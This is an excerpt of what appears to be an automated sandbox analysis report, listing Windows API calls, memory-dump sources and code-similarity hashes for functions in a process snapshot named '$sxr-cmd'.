• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF61550E904,?,?,?,?,00000000,00007FF615503491,?,?,00000000,00007FF615514420), ref: 00007FF615500251
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
• String ID:
• API String ID: 513048808-0
• Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
• Instruction ID: 0c203eb6a5136d2c96eb4742db2bf7e56381c48ca6cd254f602e5c9a2493eaba
• Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
• Instruction Fuzzy Hash: 74215C2990CE83C7E6504BA4E984239EB90FF49F79F555236DA0EC26B1DF7CAC448700
Uniqueness
Uniqueness Score: -1.00%

APIs
• _get_osfhandle.MSVCRT ref: 00007FF615503584
• GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF61550359C
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035C3
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035D9
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035ED
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF615503602
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
• String ID:
• API String ID: 513048808-0
• Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
• Instruction ID: e3a393c446e8f2d974546de2b2237dad0d851483aa9407034899d87c26d129a5
• Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
• Instruction Fuzzy Hash: EA115129A08E42C6EA104B64E544079EA90FF49F79F1A5735DA2EC27F1DF3CDC448700
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 4104442557-0
• Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
• Instruction ID: 00dea9e8ba4fe80163a70baf7ab9586ee1dd442fff864759ea66b529cee0933f
• Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
• Instruction Fuzzy Hash: C6114F26604F41CAEF00DF70E8441A873A4FB09F68F410A31EA6D87B64EF3CDAA58740
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
• String ID:
• API String ID: 517849248-0
• Opcode ID: dd2bb52e115c473e0f8e08ec62385b9b1bc9a7885310831d85afcbe291b8297d
• Instruction ID: 8adc426835350826459c8e5c9084611fbb4a68f2a0d3b1f14e0cf7e6298dbd6e
• Opcode Fuzzy Hash: dd2bb52e115c473e0f8e08ec62385b9b1bc9a7885310831d85afcbe291b8297d
• Instruction Fuzzy Hash: EF015B21709B8196FA10DB92E45835963A2FB88FE1F888034CE8D4B755EE3EC9858744
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
• String ID:
• API String ID: 449555515-0
• Opcode ID: 4f9aa0d141a117e5b28f836a31fda0da5fbbd9299a6c1a47c4e907238d40991d
• Instruction ID: 5cf49d1a071ca34c8d8ee550cd69a13bfc7a0020d28b559792b9179741ef7094
• Opcode Fuzzy Hash: 4f9aa0d141a117e5b28f836a31fda0da5fbbd9299a6c1a47c4e907238d40991d
• Instruction Fuzzy Hash: 4B11396560AB4086FB24DBA1E84C76932B2BB48FA1F840425C95D0E356FF3EC0088718
Uniqueness
Uniqueness Score: -1.00%

APIs
• OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6155171F9
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF61551720D
• OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF615517300
  • Part of subcall function 00007FF615515740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF6155175C4,?,?,00000000,00007FF615516999,?,?,?,?,?,00007FF615508C39), ref: 00007FF615515744
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: OpenSemaphore$CloseErrorHandleLast
• String ID: _p0$wil
• API String ID: 455305043-1814513734
• Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
• Instruction ID: 13baa382627559649449ab590e254f142322265255bfe4d079cfebee63ec43a9
• Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
• Instruction Fuzzy Hash: 0E61A469B28E8285EF258F6994901B9A7B1FF84FA4F544531DA0E8B7A5EF3CDD058300
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
• API String ID: 2395640692-629598281
• Opcode ID: e553a6fcd8766cf47cad89aa0da34990ab2b17b041ac015739fdea2a23d0852d
• Instruction ID: 6448cbd064bb5c7f42280aa81c0e2d51b40f6540c676c91d3383f40e97003410
• Opcode Fuzzy Hash: e553a6fcd8766cf47cad89aa0da34990ab2b17b041ac015739fdea2a23d0852d
• Instruction Fuzzy Hash: 5E518D3261BB008AFB14CB55E448B5937B6F3C4BA8F918134DE1A4B7CAEB36C941CB04
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: wcschr$Heapiswspacememset$AllocProcess
• String ID: %s
• API String ID: 2401724867-3043279178
• Opcode ID: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
• Instruction ID: 16db4bf517c86123a5de5c680fd259fc2db50d8fda79f79e4256b0d86a9a3ae3
• Opcode Fuzzy Hash: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
• Instruction Fuzzy Hash: 19519136B08A82C6EB618F25D8502B9B7A0EB49FA8F445135DA5D877B4EF3CE855C700
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: iswdigit
• String ID: GeToken: (%x) '%s'
• API String ID: 3849470556-1994581435
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF615519A10
• RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF615519994
  • Part of subcall function 00007FF61551A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF615519A82), ref: 00007FF61551A77A
  • Part of subcall function 00007FF61551A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF615519A82), ref: 00007FF61551A839
  • Part of subcall function 00007FF61551A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF615519A82), ref: 00007FF61551A850
• wcsrchr.MSVCRT ref: 00007FF615519A62
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: ErrorLast$CloseEnumOpenwcsrchr
• String ID: %s=%s$.
• API String ID: 3242694432-4275322459
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6155154E6
• CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF61551552E
  • Part of subcall function 00007FF61551758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF615516999,?,?,?,?,?,00007FF615508C39), ref: 00007FF6155175AE
  • Part of subcall function 00007FF61551758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF615516999,?,?,?,?,?,00007FF615508C39), ref: 00007FF6155175C6
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: ErrorLast$CreateCurrentMutexProcess
• String ID: Local\SM0:%d:%d:%hs$wil$x
• API String ID: 779401067-630742106
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: CurrentDirectorytowupper
• String ID: :$:
• API String ID: 238703822-3780739392
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
• API String ID: 3677997916-3870813718
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: FinalHandleNamePathlstrlen
• String ID: \\?\
• API String ID: 2719912262-4282027825
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: CombinePath
• String ID: \\.\pipe\
• API String ID: 3422762182-91387939
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
• String ID:
• API String ID: 2210144848-0
                                                                                                                      • Opcode ID: 805c3f4572016d1162eba903c1866f821554d6bcbc59870d2561a84f84d0e957
                                                                                                                      • Instruction ID: 5a742476be3838df04a20d0c2adcc28e5e263ddcb40bf654d77dae0485640db6
                                                                                                                      • Opcode Fuzzy Hash: 805c3f4572016d1162eba903c1866f821554d6bcbc59870d2561a84f84d0e957
                                                                                                                      • Instruction Fuzzy Hash: A981CF22A1AB4099FB10DBE498483AD67B3F744FA8FC44115DE0E5B797EB3B8449C710
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memsetwcsrchr$wcschr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 110935159-0
                                                                                                                      • Opcode ID: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                                                                                                      • Instruction ID: 5dbbeb76c033f40895f61526ed5eb3583873754c4843f13c5523f7726c64deb5
                                                                                                                      • Opcode Fuzzy Hash: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                                                                                                      • Instruction Fuzzy Hash: 9551B466B09B8285FE218F1A98447F9A6A0BF48FB4F444531CE5E8B7A4DF3CE9518300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$CurrentDirectorytowupper
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1403193329-0
                                                                                                                      • Opcode ID: 75a07d5bd23dcdf46afeab1086ab6ee4728832850a12a13c2f157218a155009a
                                                                                                                      • Instruction ID: 66e09ee36f043934104e5b2ea6f5ea10e1ab11ef5e62028446f0d4bc188d5ba9
                                                                                                                      • Opcode Fuzzy Hash: 75a07d5bd23dcdf46afeab1086ab6ee4728832850a12a13c2f157218a155009a
                                                                                                                      • Instruction Fuzzy Hash: 6351B72AA05A8185EB24DF20D9506BAB7A0FF44F6CF558136DA1DC76A4EF3CE9448710
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • memset.MSVCRT ref: 00007FF6154F921C
                                                                                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6154F93AA
                                                                                                                        • Part of subcall function 00007FF6154F8B20: wcsrchr.MSVCRT ref: 00007FF6154F8BAB
                                                                                                                        • Part of subcall function 00007FF6154F8B20: _wcsicmp.MSVCRT ref: 00007FF6154F8BD4
                                                                                                                        • Part of subcall function 00007FF6154F8B20: _wcsicmp.MSVCRT ref: 00007FF6154F8BF2
                                                                                                                        • Part of subcall function 00007FF6154F8B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6154F8C16
                                                                                                                        • Part of subcall function 00007FF6154F8B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6154F8C2F
                                                                                                                        • Part of subcall function 00007FF6154F8B20: wcschr.MSVCRT ref: 00007FF6154F8CB3
                                                                                                                        • Part of subcall function 00007FF61550417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6155041AD
                                                                                                                        • Part of subcall function 00007FF615503060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF6154F92AC), ref: 00007FF6155030CA
                                                                                                                        • Part of subcall function 00007FF615503060: SetErrorMode.KERNELBASE ref: 00007FF6155030DD
                                                                                                                        • Part of subcall function 00007FF615503060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6155030F6
                                                                                                                        • Part of subcall function 00007FF615503060: SetErrorMode.KERNELBASE ref: 00007FF615503106
                                                                                                                      • wcsrchr.MSVCRT ref: 00007FF6154F92D8
                                                                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6154F9362
                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6154F9373
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3966000956-0
                                                                                                                      • Opcode ID: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                                                                                                      • Instruction ID: 585f960b818988d9b2eb8a725dac56179f1a3d49a279115f1a8e82410e9c020d
                                                                                                                      • Opcode Fuzzy Hash: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                                                                                                      • Instruction Fuzzy Hash: 71518736A09F8285EB619F29D8502B9B3A0FF49F64F144036DA4D87BA5DF3CE965C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2882836952-0
                                                                                                                      • Opcode ID: 98b2d38467aad0f12371f4981a99e71c5d2d9a384676790713b3d681f93ff9b7
                                                                                                                      • Instruction ID: ad4e23bcd7e08d9c55c416e097f9322c92f4db55f064fc91f288cac7c7d56d0f
                                                                                                                      • Opcode Fuzzy Hash: 98b2d38467aad0f12371f4981a99e71c5d2d9a384676790713b3d681f93ff9b7
                                                                                                                      • Instruction Fuzzy Hash: 3761DC3251EB84C6F760DB99E44931A77B1F398764F900116EA8E4BBA6EB7DC550CF00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$_setjmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3883041866-0
                                                                                                                      • Opcode ID: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                                                                                                      • Instruction ID: d501803328dac01566c0c03de5b55141407d4da2f336b8d556a25ad2b2b56c35
                                                                                                                      • Opcode Fuzzy Hash: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                                                                                                      • Instruction Fuzzy Hash: DC515236A08BC68AEB61CF25D8503E9B7A4FB45F58F404136DA4D87A68DF3CDA45CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _wcsicmp.MSVCRT ref: 00007FF6154FB4BD
                                                                                                                        • Part of subcall function 00007FF6155006C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF6155006D6
                                                                                                                        • Part of subcall function 00007FF6155006C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF6155006F0
